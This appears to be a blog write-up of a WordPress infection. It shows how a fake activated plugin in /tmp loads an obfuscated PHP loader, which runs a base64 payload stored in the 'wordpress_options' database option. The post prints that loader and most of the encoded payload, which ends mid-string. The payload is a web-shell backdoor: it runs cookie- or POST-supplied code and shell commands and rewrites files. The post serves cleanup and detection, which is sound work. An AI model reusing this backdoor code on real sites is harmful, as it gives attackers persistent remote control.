Wordpress Exploit: wordpress_options

After spending a weekend evening, together with mysurface, we tracked down a Wordpress exploit running silently in several blogs. This document describes a walk-through to reveal the exploit code.

Symptoms

• Several *_new.giff *_old.pngg *_new.php files exists in your Wordpress's sub-directories, e.g. wp-content/uploads/ directory.
• Strange spam-links appear on your blog pages when retrieved by a GoogleBot. Check this with:
  curl --user-agent "Googlebot/2.1 (+http://www.google.com/bot.html)" http://yourblogsite.com

Exploit Walkthrough

1. Fake activated plugin(s)

Check the 'active_plugins' option in your WordPress database. It should contain ONLY the file paths that point to activated plugin scripts.

SELECT * FROM wp_options WHERE option_name = 'active_plugins'

For example, this is a normal SpamKarma 2 plugin:

i:1;s:27:"SK2/spam_karma_2_plugin.php"

But this is not. You need to remove it:

i:0;s:117:"../../../../../../../../../../../../../../../../../../../../../../tmp/tmpTz3eoe/sess_77cae6776e0eebb17329bf7a93a1ef6f"

In this case, it is a fake plugin script. But since your Wordpress thinks that it's just another activated plugin, it loads and runs the script everyday.

The fake plugin script, in our case, was found located at /tmp/tmpTz3eoe/sess_77cae6776e0eebb17329bf7a93a1ef6f. It contains some cryptic codes:

<?/*?#?#,,sess,GFjdD0i 0FDVElPTl0iOyAkdG1 X3NoZ xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg KTsNCkBjaG1vZChzd JzdHIoJHRtcF9zaGVsbC LHN0cnJ b3MoJHRtcF9zaGVsbC iLyIpKS Nzc3KTsNCkBjaG1vZCgkdG1 X3NoZ xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1 X3NoZ xsLDA1NTUpO 0Ka YoJGFjdD09InRtcCIpIEBjaG1vZChzd JzdHIoJHRtcF9zaGVsbC LHN0cnJ b3MoJHRtcF9zaGVsbC iLyIpKS NTU1KTsNCiRsYz0i 0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO 0KC VjaG8oIj hLS0gZXggLS0 Iik7DQoJJGxpbj1 cmVnX3JlcGxhY2UoIi9fLyIsICIrIi gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa 4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O 0KfQ0KJGZmd 5jdHh0PSckcD0iJy4kdG1 X3NoZ xsLiciO 0KJGE9Z2V0X29 dGlvbigiY N0aXZlX3Bsd dpbnMiKTsNCiRiP ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay kcCkhPT1mY xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh 109JHA7IHV ZGF0ZV9vcHRpb24oImFjdGl2ZV9 bHVna 5zIi kYSk7IH0nO 0KJGZmd 5jP NyZ F0ZV9md 5jdGlvbignJy kZmZ1bmN0eHQpO 0KY RkX2FjdGlvbigidXBkYXRlX29 dGlvbl9hY3RpdGFjdD0i 0FDVElPTl0iOyAkdG1 X3NoZ xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg KTsNCkBjaG1vZChzd JzdHIoJHRtcF9zaGVsbC LHN0cnJ b3MoJHRtcF9zaGVsbC iLyIpKS Nzc3KTsNCkBjaG1vZCgkdG1 X3NoZ xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1 X3NoZ xsLDA1NTUpO 0Ka YoJGFjdD09InRtcCIpIEBjaG1vZChzd JzdHIoJHRtcF9zaGVsbC LHN0cnJ b3MoJHRtcF9zaGVsbC iLyIpKS NTU1KTsNCiRsYz0i 0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO 0KC VjaG8oIj hLS0gZXggLS0 Iik7DQoJJGxpbj1 cmVnX3JlcGxhY2UoIi9fLyIsICIrIi gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa 4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O 0KfQ0KJGZmd 5jdHh0PSckcD0iJy4kdG1 X3NoZ xsLiciO 0KJGE9Z2V0X29 dGlvbigiY N0aXZlX3Bsd dpbnMiKTsNCiRiP ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay kcCkhPT1mY xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh 109JHA7IHV ZGF0ZV9vcHRpb24oImFjdGl2ZV9 bHVna 5zIi kYSk7IH0nO 0KJGZmd 5jP NyZ F0ZV9md 5jdGlvbignJy kZmZ1bmN0eHQpO 0KY RkX2FjdGlvbigidXBkYXRlX29 dGlvbl9hY3RpdGFjdD0i 0FDVElPTl0iOyAkdG1 X3NoZ xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg KTsNCkBjaG1vZChzd JzdHIoJHRtcF9zaGVsbC LHN0cnJ b3MoJHRtcF9zaGVsbC iLyIpKS Nzc3KTsNCkBjaG1vZCgkdG1 X3NoZ xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1 X3NoZ xsLDA1NTUpO 0Ka YoJGFjdD09InRtcCIpIEBjaG1vZChzd JzdHIoJHRtcF9zaGVsbC LHN0cnJ b3MoJHRtcF9zaGVsbC iLyIpKS NTU1KTsNCiRsYz0i 0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO 0KC VjaG8oIj hLS0gZXggLS0 Iik7DQoJJGxpbj1 cmVnX3JlcGxhY2UoIi9fLyIsICIrIi gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa 4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O 0KfQ0KJGZmd 5jdHh0PSckcD0iJy4kdG1 X3NoZ xsLiciO 0KJGE9Z2V0X29 dGlvbigiY N0aXZlX3Bsd dpbnMiKTsNCiRiP ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay kcCkhPT1mY xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh 109JHA7IHV ZGF0ZV9vcHRpb24oImFjdGl2ZV9 bHVna 5zIi kYSk7IH0nO 0KJGZmd 5jP NyZ F0ZV9md 5jdGlvbignJy kZmZ1bmN0eHQpO 0KY RkX2FjdGlvbigidXBkYXRlX29 dGlvbl9hY3Rpd */$f=create_function/* GFjdD0i 0FDVElPTl0iOyAkdG1 X3NoZ xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg KTsNCkBjaG1vZChzd JzdHIoJHRtcF9zaGVsbC LHN0cnJ b3MoJHRtcF9zaGVsbC iLyIpKS Nzc3KTsNCkBjaG1vZCgkdG1 X3NoZ xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1 X3NoZ xsLDA1NTUpO 0Ka YoJGFjdD09InRtcCIpIEBjaG1vZChzd JzdHIoJHRtcF9zaGVsbC LHN0cnJ b3MoJHRtcF9zaGVsbC iLyIpKS NTU1KTsNCiRsYz0i 0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO 0KC VjaG8oIj hLS0gZXggLS0 Iik7DQoJJGxpbj1 cmVnX3JlcGxhY2UoIi9fLyIsICIrIi gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa 4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O 0KfQ0KJGZmd 5jdHh0PSckcD0iJy4kdG1 X3NoZ xsLiciO 0KJGE9Z2V0X29 dGlvbigiY N0aXZlX3Bsd dpbnMiKTsNCiRiP ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay kcCkhPT1mY xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh 109JHA7IHV ZGF0ZV9vcHRpb24oImFjdGl2ZV9 bHVna 5zIi kYSk7IH0nO 0KJGZmd 5jP NyZ F0ZV9md 5jdGlvbignJy kZmZ1bmN0eHQpO 0KY RkX2FjdGlvbigidXBkYXRlX29 dGlvbl9hY3Rpd */("",/* GFjdD0i 0FDVElPTl0iOyAkdG1 X3NoZ xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg KTsNCkBjaG1vZChzd JzdHIoJHRtcF9zaGVsbC LHN0cnJ b3MoJHRtcF9zaGVsbC iLyIpKS Nzc3KTsNCkBjaG1vZCgkdG1 X3NoZ xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1 X3NoZ xsLDA1NTUpO 0Ka YoJGFjdD09InRtcCIpIEBjaG1vZChzd JzdHIoJHRtcF9zaGVsbC LHN0cnJ b3MoJHRtcF9zaGVsbC iLyIpKS NTU1KTsNCiRsYz0i 0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO 0KC VjaG8oIj hLS0gZXggLS0 Iik7DQoJJGxpbj1 cmVnX3JlcGxhY2UoIi9fLyIsICIrIi gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa 4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O 0KfQ0KJGZmd 5jdHh0PSckcD0iJy4kdG1 X3NoZ xsLiciO 0KJGE9Z2V0X29 dGlvbigiY N0aXZlX3Bsd dpbnMiKTsNCiRiP ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay kcCkhPT1mY xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh 109JHA7IHV ZGF0ZV9vcHRpb24oImFjdGl2ZV9 bHVna 5zIi kYSk7IH0nO 0KJGZmd 5jP NyZ F0ZV9md 5jdGlvbignJy kZmZ1bmN0eHQpO 0KY RkX2FjdGlvbigidXBkYXRlX29 dGlvbl9hY3Rpd*/strrev(/* GFjdD0i 0FDVElPTl0iOyAkdG1 X3NoZ xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg KTsNCkBjaG1vZChzd JzdHIoJHRtcF9zaGVsbC LHN0cnJ b3MoJHRtcF9zaGVsbC iLyIpKS Nzc3KTsNCkBjaG1vZCgkdG1 X3NoZ xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1 X3NoZ xsLDA1NTUpO 0Ka YoJGFjdD09InRtcCIpIEBjaG1vZChzd JzdHIoJHRtcF9zaGVsbC LHN0cnJ b3MoJHRtcF9zaGVsbC iLyIpKS NTU1KTsNCiRsYz0i 0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO 0KC VjaG8oIj hLS0gZXggLS0 Iik7DQoJJGxpbj1 cmVnX3JlcGxhY2UoIi9fLyIsICIrIi gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa 4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O 0KfQ0KJGZmd 5jdHh0PSckcD0iJy4kdG1 X3NoZ xsLiciO 0KJGE9Z2V0X29 dGlvbigiY N0aXZlX3Bsd dpbnMiKTsNCiRiP ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay kcCkhPT1mY xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh 109JHA7IHV ZGF0ZV9vcHRpb24oImFjdGl2ZV9 bHVna 5zIi kYSk7IH0nO 0KJGZmd 5jP NyZ F0ZV9md 5jdGlvbignJy kZmZ1bmN0eHQpO 0KY RkX2FjdGlvbigidXBkYXRlX29 dGlvbl9hY3Rpd*/get_option(/* GFjdD0i 0FDVElPTl0iOyAkdG1 X3NoZ xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg KTsNCkBjaG1vZChzd JzdHIoJHRtcF9zaGVsbC LHN0cnJ b3MoJHRtcF9zaGVsbC iLyIpKS Nzc3KTsNCkBjaG1vZCgkdG1 X3NoZ xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1 X3NoZ xsLDA1NTUpO 0Ka YoJGFjdD09InRtcCIpIEBjaG1vZChzd JzdHIoJHRtcF9zaGVsbC LHN0cnJ b3MoJHRtcF9zaGVsbC iLyIpKS NTU1KTsNCiRsYz0i 0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO 0KC VjaG8oIj hLS0gZXggLS0 Iik7DQoJJGxpbj1 cmVnX3JlcGxhY2UoIi9fLyIsICIrIi gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa 4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O 0KfQ0KJGZmd 5jdHh0PSckcD0iJy4kdG1 X3NoZ xsLiciO 0KJGE9Z2V0X29 dGlvbigiY N0aXZlX3Bsd dpbnMiKTsNCiRiP ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay kcCkhPT1mY xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh 109JHA7IHV ZGF0ZV9vcHRpb24oImFjdGl2ZV9 bHVna 5zIi kYSk7IH0nO 0KJGZmd 5jP NyZ F0ZV9md 5jdGlvbignJy kZmZ1bmN0eHQpO 0KY RkX2FjdGlvbigidXBkYXRlX29 dGlvbl9hY3Rpd*/"wordpress_options"/* GFjdD0i 0FDVElPTl0iOyAkdG1 X3NoZ xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg KTsNCkBjaG1vZChzd JzdHIoJHRtcF9zaGVsbC LHN0cnJ b3MoJHRtcF9zaGVsbC iLyIpKS Nzc3KTsNCkBjaG1vZCgkdG1 X3NoZ xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1 X3NoZ xsLDA1NTUpO 0Ka YoJGFjdD09InRtcCIpIEBjaG1vZChzd JzdHIoJHRtcF9zaGVsbC LHN0cnJ b3MoJHRtcF9zaGVsbC iLyIpKS NTU1KTsNCiRsYz0i 0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO 0KC VjaG8oIj hLS0gZXggLS0 Iik7DQoJJGxpbj1 cmVnX3JlcGxhY2UoIi9fLyIsICIrIi gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa 4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O 0KfQ0KJGZmd 5jdHh0PSckcD0iJy4kdG1 X3NoZ xsLiciO 0KJGE9Z2V0X29 dGlvbigiY N0aXZlX3Bsd dpbnMiKTsNCiRiP ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay kcCkhPT1mY xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh 109JHA7IHV ZGF0ZV9vcHRpb24oImFjdGl2ZV9 bHVna 5zIi kYSk7IH0nO 0KJGZmd 5jP NyZ F0ZV9md 5jdGlvbignJy kZmZ1bmN0eHQpO 0KY RkX2FjdGlvbigidXBkYXRlX29 dGlvbl9hY3Rpd*/)));/* GFjdD0i 0FDVElPTl0iOyAkdG1 X3NoZ xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg KTsNCkBjaG1vZChzd JzdHIoJHRtcF9zaGVsbC LHN0cnJ b3MoJHRtcF9zaGVsbC iLyIpKS Nzc3KTsNCkBjaG1vZCgkdG1 X3NoZ xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1 X3NoZ xsLDA1NTUpO 0Ka YoJGFjdD09InRtcCIpIEBjaG1vZChzd JzdHIoJHRtcF9zaGVsbC LHN0cnJ b3MoJHRtcF9zaGVsbC iLyIpKS NTU1KTsNCiRsYz0i 0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO 0KC VjaG8oIj hLS0gZXggLS0 Iik7DQoJJGxpbj1 cmVnX3JlcGxhY2UoIi9fLyIsICIrIi gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa 4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O 0KfQ0KJGZmd 5jdHh0PSckcD0iJy4kdG1 X3NoZ xsLiciO 0KJGE9Z2V0X29 dGlvbigiY N0aXZlX3Bsd dpbnMiKTsNCiRiP ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay kcCkhPT1mY xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh 109JHA7IHV ZGF0ZV9vcHRpb24oImFjdGl2ZV9 bHVna 5zIi kYSk7IH0nO 0KJGZmd 5jP NyZ F0ZV9md 5jdGlvbignJy kZmZ1bmN0eHQpO 0KY RkX2FjdGlvbigidXBkYXRlX29 dGlvbl9hY3Rpd */ $f(); /* GFjdD0i 0FDVElPTl0iOyAkdG1 X3NoZ xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg KTsNCkBjaG1vZChzd JzdHIoJHRtcF9zaGVsbC LHN0cnJ b3MoJHRtcF9zaGVsbC iLyIpKS Nzc3KTsNCkBjaG1vZCgkdG1 X3NoZ xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1 X3NoZ xsLDA1NTUpO 0Ka YoJGFjdD09InRtcCIpIEBjaG1vZChzd JzdHIoJHRtcF9zaGVsbC LHN0cnJ b3MoJHRtcF9zaGVsbC iLyIpKS NTU1KTsNCiRsYz0i 0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO 0KC VjaG8oIj hLS0gZXggLS0 Iik7DQoJJGxpbj1 cmVnX3JlcGxhY2UoIi9fLyIsICIrIi gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa 4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O 0KfQ0KJGZmd 5jdHh0PSckcD0iJy4kdG1 X3NoZ xsLiciO 0KJGE9Z2V0X29 dGlvbigiY N0aXZlX3Bsd dpbnMiKTsNCiRiP ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay kcCkhPT1mY xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh 109JHA7IHV ZGF0ZV9vcHRpb24oImFjdGl2ZV9 bHVna 5zIi kYSk7IH0nO 0KJGZmd 5jP NyZ F0ZV9md 5jdGlvbignJy kZmZ1bmN0eHQpO 0KY RkX2FjdGlvbigidXBkYXRlX29 dGlvbl9hY3RpdGFjdD0i 0FDVElPTl0iOyAkdG1 X3NoZ xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg KTsNCkBjaG1vZChzd JzdHIoJHRtcF9zaGVsbC LHN0cnJ b3MoJHRtcF9zaGVsbC iLyIpKS Nzc3KTsNCkBjaG1vZCgkdG1 X3NoZ xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1 X3NoZ xsLDA1NTUpO 0Ka YoJGFjdD09InRtcCIpIEBjaG1vZChzd JzdHIoJHRtcF9zaGVsbC LHN0cnJ b3MoJHRtcF9zaGVsbC iLyIpKS NTU1KTsNCiRsYz0i 0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO 0KC VjaG8oIj hLS0gZXggLS0 Iik7DQoJJGxpbj1 cmVnX3JlcGxhY2UoIi9fLyIsICIrIi gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa 4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O 0KfQ0KJGZmd 5jdHh0PSckcD0iJy4kdG1 X3NoZ xsLiciO 0KJGE9Z2V0X29 dGlvbigiY N0aXZlX3Bsd dpbnMiKTsNCiRiP ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay kcCkhPT1mY xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh 109JHA7IHV ZGF0ZV9vcHRpb24oImFjdGl2ZV9 bHVna 5zIi kYSk7IH0nO 0KJGZmd 5jP NyZ F0ZV9md 5jdGlvbignJy kZmZ1bmN0eHQpO 0KY RkX2FjdGlvbigidXBkYXRlX29 dGlvbl9hY3Rpd */?>

By removing all the /* .. */ comments, you will get this:

<? $f=create_function("",strrev(get_option("wordpress_options"))); $f(); ?>

Notice that, the script retrieves 'wordpress_options' option from your WordPress database.

2. Encoded 'wordpress_options' option

So, if the 'wordpress_options' option exists in your database, remove it.

SELECT option_value FROM wp_options WHERE option_name = 'wordpress_options'

It contains the exploit code, which is based64-encoded:

JGFjdD0idG1wIjsgJHRtcF9zaGVsbD0iLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vdG1wL3RtcFR6M2VvZS9zZXNzXzc3Y2FlNjc3NmUwZWViYjE3MzI5YmY3YTkzYTFlZjZmIjsNCmVycm9yX3JlcG9ydGluZygwKTsNCkBjaG1vZChzdWJzdHIoJHRtcF9zaGVsbCwwLHN0cnJwb3MoJHRtcF9zaGVsbCwiLyIpKSwwNzc3KTsNCkBjaG1vZCgkdG1wX3NoZWxsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1wX3NoZWxsLDA1NTUpOw0KaWYoJGFjdD09InRtcCIpIEBjaG1vZChzdWJzdHIoJHRtcF9zaGVsbCwwLHN0cnJwb3MoJHRtcF9zaGVsbCwiLyIpKSwwNTU1KTsNCiRsYz0iODIwMTgyMzVkNGQ2ZGU2MjhiYmJhY2MzMmUzODBlNTQiOw0KaWYoaXNzZXQoJF9DT09LSUVbJGxjXSkpew0KCSRsaW49JF9DT09LSUVbJGxjXTsNCgllY2hvKCI8IS0tIGV4IC0tPiIpOw0KCSRsaW49cHJlZ19yZXBsYWNlKCIvXy8iLCAiKyIsICRsaW4pOw0KCWV2YWwoYmFzZTY0X2RlY29kZSgkbGluKSk7DQoJZWNobygiPCEtLSAvZXggLS0+Iik7DQoJZXhpdDsNCn0NCiRmZnVuY3R4dD0nJHA9IicuJHRtcF9zaGVsbC4nIjsNCiRhPWdldF9vcHRpb24oImFjdGl2ZV9wbHVnaW5zIik7DQokYj1mYWxzZTsgaWYoaXNfYXJyYXkoJGEpKSBmb3JlYWNoKCRhIGFzICRrKSBpZihzdHJwb3MoJGssJHApIT09ZmFsc2UpICRiPXRydWU7DQppZighJGIpeyAkYVtdPSRwOyB1cGRhdGVfb3B0aW9uKCJhY3RpdmVfcGx1Z2lucyIsJGEpOyB9JzsNCiRmZnVuYz1jcmVhdGVfZnVuY3Rpb24oJycsJGZmdW5jdHh0KTsNCmFkZF9hY3Rpb24oInVwZGF0ZV9vcHRpb25fYWN0aXZlX3BsdWdpbnMiLCRmZnVuYyk7DQppZihtZDUoJF9DT09LSUVbJ193cF9kZWJ1Z2dlciddKT09ImZiYjIxOTBiOGNkNGI1YWMwMzBjMTA2MjRiZjM2ZTYwIil7IGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2ZpbGUnXSkpOyB9DQppZihtZDUoJF9DT09LSUVbJ3F3ZXJ0eSddKT09ImE2NWI5OTYwY2YyNWMwYTlmZTQyNDU5NmY4YjZkY2I3Iikgew0KY2xlYXJzdGF0Y2FjaGUoKTsNCnNldF9tYWdpY19xdW90ZXNfcnVudGltZSgwKTsNCmlmKCFmdW5jdGlvbl9leGlzdHMoJ2luaV9zZXQnKSl7DQpmdW5jdGlvbiBpbmlfc2V0KCl7DQpyZXR1cm4gRkFMU0U7DQp9DQp9DQppbmlfc2V0KCdvdXRwdXRfYnVmZmVyaW5nJywwKTsNCmlmKEBzZXRfdGltZV9saW1pdCgwKSB8fCBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLCAwKSkgJGxpbWl0ID0gJ25vdCBsaW1pdGVkJzsNCmVsc2UgJGxpbWl0ID0gZ2V0X2NmZ192YXIoJ21heF9leGVjdXRpb25fdGltZScpOw0KDQppZihpc3NldCgkSFRUUF9TRVJWRVJfVkFSUykgJiYgIWlzc2V0KCRfU0VSVkVSKSl7DQokX1BPU1QgPSAmJEhUVFBfUE9TVF9WQVJTOw0KJF9HRVQgPSAmJEhUVFBfR0VUX1ZBUlM7DQokX1NFUlZFUiA9ICYkSFRUUF9TRVJWRVJfVkFSUzsNCn0NCg0KaWYoQGdldF9tYWdpY19xdW90ZXNfZ3BjKCkpew0KZm9yZWFjaCgkX1BPU1QgYXMgJGs9PiR2KSAkX1BPU1RbJGtdID0gc3RyaXBzbGFzaGVzKCR2KTsNCmZvcmVhY2goJF9TRVJWRVIgYXMgJGs9PiR2KSAkX1NFUlZFUlska10gPSBzdHJpcHNsYXNoZXMoJHYpOw0KfQ0KDQpmdW5jdGlvbiBleGVjdXRlKCRjKXsNCmlmKGZ1bmN0aW9uX2V4aXN0cygnZXhlYycpKXsNCkBleGVjKCRjLCAkb3V0KTsNCnJldHVybiBAaW1wbG9kZSgiXG4iLCAkb3V0KTsNCn1lbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJG91dCA9IEBzaGVsbF9leGVjKCRjKTsNCnJldHVybiAkb3V0Ow0KfWVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3N5c3RlbScpKXsNCkBvYl9zdGFydCgpOw0KQHN5c3RlbSgkYywgJHJldCk7DQokb3V0ID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KcmV0dXJuICRvdXQ7DQp9ZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygncGFzc3RocnUnKSl7DQpAb2Jfc3RhcnQoKTsNCkBwYXNzdGhydSgkYywgJHJldCk7DQokb3V0ID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KcmV0dXJuICRvdXQ7DQp9ZWxzZXsNCnJldHVybiBGQUxTRTsNCn0NCn0NCg0KZnVuY3Rpb24gcmVhZCgkZil7DQokc3RyID0gQGZpbGUoJGYpOw0KaWYoJHN0cil7DQokb3V0ID0gaW1wbG9kZSgnJywgJHN0cik7DQp9ZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnY3VybF92ZXJzaW9uJykpew0KQG9iX3N0YXJ0KCk7DQokaCA9IEBjdXJsX2luaXQoJ2ZpbGU6LycuJy8nLiRmKTsNCkBjdXJsX2V4ZWMoJGgpOw0KJG91dCA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn1lbHNlew0KJG91dCA9ICdDb3VsZCBub3QgcmVhZCBmaWxlISc7DQp9DQpyZXR1cm4gaHRtbHNwZWNpYWxjaGFycygkb3V0KTsNCn0NCg0KZnVuY3Rpb24gd3JpdGUoJGYsICRjKXsNCiR0ID0gZmlsZW10aW1lKCRmKTsNCiRmcCA9IEBmb3BlbigkZiwgJ3cnKTsNCmlmKCRmcCl7DQpmd3JpdGUoJGZwLCAkYyk7DQpmY2xvc2UoJGZwKTsNCiRvdXQgPSAnRmlsZSBzYXZlZC4nLiJcbiI7DQppZigkdCAmJiB0b3VjaCgkZiwgJHQpKXsNCiRvdXQgLj0gJ0xhc3QgbW9kaWZpY2F0aW9uIHRpbWUgY2hhbmdlZC4nOw0KfWVsc2V7DQokb3V0IC49ICdDb3VsZCBub3QgY2hhbmdlIGxhc3QgbW9kaWZpY2F0aW9uIHRpbWUhJzsNCn0NCn1lbHNlew0KJG91dCA9ICdTYXZpbmcgZmFpbGVkISc7DQp9DQpyZXR1cm4gJG91dDsNCn0NCg0KZnVuY3Rpb24gZmlsZV9zaXplKCRmKXsNCiRzaXplID0gZmlsZXNpemUoJGYpOw0KaWYoJHNpemUgPCAxMDI0KSAkc2l6ZSA9ICRzaXplLicmbmJzcDtiJzsNCmVsc2VpZigkc2l6ZSA8IDEwNDg1NzYpICRzaXplID0gcm91bmQoJHNpemUvMTAyNCoxMDApLzEwMCAuICcmbmJzcDtLYic7DQplbHNlaWYoJHNpemUgPCAxMDczNzQxO